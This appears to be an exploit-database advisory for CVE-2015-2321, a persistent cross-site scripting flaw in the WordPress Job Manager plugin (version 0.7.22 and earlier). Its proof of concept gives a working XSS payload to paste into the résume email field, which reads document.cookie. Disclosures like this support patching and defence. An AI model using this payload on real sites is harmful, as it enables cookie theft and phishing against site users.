WordPress Plugin Job Manager 0.7.22 – Persistent Cross-Site Scripting

  • 作者: Owais Mehtab
    日期: 2015-08-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37738/
  • Job Manager Persistent XSS
    
    Details
    ========================================================================================
    Product: Job Manager Plugin For WordPress
    Vendor-URL: www.wp-jobmanager.com
    CVE-ID: CVE-2015-2321
    
    
    Credits
    ========================================================================================
    Discovered by: Owais Mehtab
    
    
    Affected Products:
    ========================================================================================
    Job Manager Plugin <= 0.7.22
    
    Description
    ========================================================================================
    "Job Manager Plugin For WordPress"
    
    More Details
    ========================================================================================
    A persistent Cross site scripting (XSS) in Job Manager Plugin has been discovered,
    the plugin's email field was not sanitized thus the vulnerability can be easily 
    exploited and can be used to steal cookies,perform phishing attacks and other various 
    attacks compromising the security of a user.
    
    Proof of Concept
    ========================================================================================
    Click on the "send through your résume" and set the below vector in email field
    
    '"><img src=x onerror=prompt(document.cookie);>
    
    Now click on initiate chat 
    
    PoC Video